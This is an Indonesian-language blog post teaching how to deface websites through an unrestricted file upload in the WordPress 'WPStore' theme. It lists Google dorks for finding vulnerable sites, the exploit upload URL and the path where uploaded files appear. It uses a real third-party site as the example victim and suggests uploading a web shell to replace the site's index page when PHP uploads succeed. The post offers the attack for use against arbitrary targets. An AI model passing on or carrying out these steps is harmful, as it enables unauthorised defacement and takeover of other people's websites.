Assalamualaikum
Kali ini ane mau berbagi artikel tentang " CARA DEFACE WEB DENGAN WPSTORE THEMES UPLOADER "
cukup jelas kan judulnya guys,,, :D
ok deh,,,, Dari pada kelamaan langsung aja ya guys ^_^
Cekidot ~ :
Dork ==> inurl:/wp-content/themes/ WPstore/
intext:"You have 0($0) item in your Shopping Bag"
intext:"You have 0($0) item in your Shopping Bag"
Exploit ==> /wp-content/themes/WPStore/ upload/
hasil == > /wp-content/uploads/ products_img/namafilekamu
Caranya :
1. Copy dork di atas di kotak pencarian google.
2. Pilih salah satu web dari sekian banyak web untuk di deface.
3. Ane ambil contoh : http://gorda.ge/wp-content/ themes/WPStore/upload/style/
4. masukkan exploit di atas , Ganti URL nya menjadi -> http://gorda.ge/wp-content/ themes/WPStore/upload/
5. Lalu upload script deface kalian, misalkan saya mau upload file yang bernama"z.html"
ingat
kalau berformat .php itu jarang bisa, kebanyakan yg bisa .htm / .html /
.txt ... tapi gak ada salahnya di coba guys,,, klo berhasil upload file
.php kalian bisa upload shell dan tebas index deh,, ^_^
6. Kemudian kita lihat hasilnya, ubah URL menjadi http://gorda.ge/wp-content/uploads/products_img/z.html (z.html adalah nama file ane, kalian bisa mengganti z.html dengan nama script deface kalian guys... ^_^)
Tidak ada komentar:
Posting Komentar